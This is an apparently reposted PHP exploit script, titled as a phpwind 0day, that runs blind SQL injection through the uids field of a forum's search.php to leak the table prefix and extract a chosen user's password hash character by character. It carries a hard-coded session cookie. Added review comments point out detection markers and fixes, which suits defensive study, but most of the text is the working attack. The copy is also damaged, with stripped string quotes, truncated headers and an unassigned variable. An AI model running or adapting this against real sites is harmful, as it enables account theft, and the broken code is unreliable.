从网上搜到的phpwind 0day的代码

2018-09-07 11:48


  <!-- Static page header sent before the PHP below runs: it declares the charset, a title and some styles, then prints a two-line banner. NOTE(review): in this copy the attribute values are unquoted, <head> is never closed and there is no <body> tag. -->
  <html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<title>Codz By 剑心</title>
<style type=text/css>
body,td {
font-family: Tahoma;
font-size: 12px;
line-height: 150%;
}
.smlfont {
font-family: Tahoma;
font-size: 11px;
}
/* NOTE(review): the selector and opening brace for the declarations below are missing in this copy. */
FONT-SIZE: 12px;
COLOR: #000000;
BACKGROUND-COLOR: #FFFFFF;
height: 18px;
border: 1px solid #666666;
padding-left: 2px;
}
.redfont {
COLOR: #A60000;
}
a:link,a:visited,a:active {
color: #000000;
text-decoration: underline;
}
a:hover {
color: #465584;
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: #EFEFEF}
.secondalt {BACKGROUND-COLOR: #F5F5F5}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

  <?php
// NOTE(review): this copy lost its string delimiters in extraction (the values
// given to $path, $cookie and $mask below are unquoted), so it is not valid PHP
// as shown. It is reproduced unchanged, for analysis only.
//
// What the visible code does: it sends a series of crafted POST requests to the
// search page of a phpwind forum and draws conclusions from whether a fixed
// "nothing found" message is present in each response.
//
// Lift the execution time limit; the script issues many sequential requests.
ini_set(max_execution_time,0);
// 7 = E_ERROR | E_WARNING | E_PARSE, so notices are not reported.
error_reporting(7);

// Request path on the forum. For defenders, this is the endpoint whose access
// logs are worth reviewing.
  $path=/search.php;
// A logged-in session is hard-coded here (auth, PHPSESSID, cknum and other
// cookies). The abort message further down shows the requests are expected to
// come from an authenticated user. Session values published like this should be
// treated as exposed and invalidated by the site owner.
$cookie=lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D;

// Account id whose row is queried; defaults to 2.
  $uid=2;
// Optional override from the uid query-string parameter, taken as-is with no validation.
$_GET[uid]&&$uid=$_GET[uid];
// Fixed thread id; it is the value selected by the injected statements below.
$tid=539264;

// Response marker, roughly "No matching content was found". The code below
// treats the absence of this text in a response as a "true" answer.
  $mask=没有查找匹配的内容;
// Number of requests sent so far; incremented inside send().
$count=0;

  //$testing=1;
//$testing=$_GET[test];
// Inactive in this copy because $testing is never set. If enabled, it would print
// the PHP version taken from the X-Powered-By response header and stop.
// That header is a version disclosure; expose_php = Off in php.ini removes it.
if($testing) {preg_match(/X-Powered-By: php\/(.+)\r\n/ie,send(),$php);echo$php[1];die();}

// When enabled, send() echoes every request body and raw response.
  //$debug=1;

  
// Random token placed in the pwuser field, so every request carries a different value.
// NOTE(review): presumably to avoid cached or rate-limited search results; confirm.
$temp=md5(rand(1,100)+microtime());
// First request body. $sql has not been assigned at this point in the visible listing.
// The uids field carries "-1" followed by SQL text and an opening "/*" comment.
// That such text is expected to reach the query suggests the server does not force
// uids to integers; the server-side fix is to cast every id in uids to an integer
// or to use bound parameters.
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1.$sql./*j&184288238=kkkk&276791066=jjjjjj;
$response=send($cmd);

// Reads the table prefix out of an SQL statement echoed back in the response
// (the text between "FROM " and "threads"). This depends on the forum showing
// database errors to the client; suppressing them removes this information leak.
  preg_match(/FROM (.+)threads/ie,$response,$match);

  $pre=$match[1];
// Three outcomes: prefix found; login form text (value=登 录, "Log in") found, meaning the
// session cookie was not accepted; otherwise the target is reported as not vulnerable.
if ($match[1]) echo Good Job!Wo Got The pre: <font color=red>.$match[1].</font><br>;
else if (strpos($response,value=登 录)) die(You Are Not Login!Try to get anthor Cookie and Useragen value!<br>);
else {echo Maybe It is not vul!<br>;die();}

// Banner, then open log.txt in append mode to keep a copy of each recovered character.
  echo Try to Get the uid=$uid s Password:<font color=red>;
$log=fopen(log.txt,a+);

  
// One pass per character, 16 in total. The method is boolean inference: each
// request appends a UNION branch that selects thread $tid only when the tested
// condition holds, and the absence of $mask in the response is read as "true".
//
// Detection: this appears as a burst of POSTs to search.php from one client
// (potentially dozens per character) whose uids field contains "union select" and
// "ord(mid(password". The constant fields 184288238=kkkk and 276791066=jjjjjj and the
// "loveshell" suffix in pwuser are further markers visible in this listing.
// Mitigation: integer-cast or bind the uids values server-side, and do not store
// passwords in a form where partial disclosure is useful to an attacker.
for($i=0;$i<16;$i++)
{

// $type is assigned in this loop but never read.
  $type=0;
// Character position inside the password value: 9 through 24.
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
// NOTE(review): $sql is encoded here without being reassigned in this copy; the
// listing looks incomplete at this point. By analogy with the letter-range check
// further down, this is presumably the digit-range check; confirm against the original.
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
// strpos() returns false when $mask is absent, so !strpos(...) means "condition held".
if(!strpos(send($cmd),$mask)) {

  $type=0;
// Character codes 48..57 are the digits '0'..'9'; one request per candidate.
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql= union select $tid from .$pre.members where uid=$uid and ord(mid(password,$sub,1))=$m;
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
if(!strpos(send($cmd),$mask)) {

// Match: print the character, append it to the log and stop testing this position.
  echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
// Move on to the next character position.
continue;
}

// Range check: is the character code between 97 and 122 (lowercase 'a'..'z')?
  $sql= union select $tid from .$pre.members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123;
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
if(!strpos(send($cmd),$mask)) {

  $type=1;
// Character codes 97..122; same one-request-per-candidate test as for the digits.
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql= union select $tid from .$pre.members where uid=$uid and ord(mid(password,$sub,1))=$m;
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd=step=3&pwuser=.$temp.loveshell.&uids=-1).$sql./*.&184288238=kkkk&276791066=jjjjjj;
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

// Reached only when neither range check answered "true": report and abort.
// The log handle is not closed on this path.
  echo error!<br>;
die(Shit!May be the data you post is Not valid!Try anthor UID\r\n);

  
}
fclose($log);
// $count is the total number of requests made through send().
echo <br>Done!We Post $count times!<br>;

  
// Sends one POST request with body $cmd over a raw socket and returns the whole
// response (headers and body) wrapped in <pre>...</pre>.
// Reads its settings from globals; $server and $useragent are never assigned in
// the visible listing. Side effect: increments the global request counter $count.
function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

  $count=$count+1;
// Hand-built HTTP/1.1 request. The fixed Accept and Accept-Language values are
// part of the request fingerprint a defender can match on.
$message = POST .$path.? HTTP/1.1\r\n;
$message .= Accept: */*\r\n;
$message .= Accept-Language: zh-cn\r\n;
// NOTE(review): the Referer and Content-Type header lines are cut off in this copy.
$message .= Referer:
$message .= Content-Type: application/x-
$message .= User-Agent: .$useragent.\r\n;
$message .= Host: .$server.\r\n;
// Declared length is strlen($cmd), while the body written below is $cmd plus "\r\n".
$message .= Content-length: .strlen($cmd).\r\n;
$message .= Connection: Keep-Alive\r\n;
$message .= Cookie: .$cookie.\r\n;
$message .= \r\n;
$message .= $cmd.\r\n;

// Plain HTTP on port 80. The result of fsockopen() is not checked before fputs();
// the read loop tests $fd, but fputs() and fclose() run regardless.
  $fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = <pre>;
// Read in 1024-byte chunks until end of stream.
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .=</pre>;
// With $debug set, echo the request body and the raw response.
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

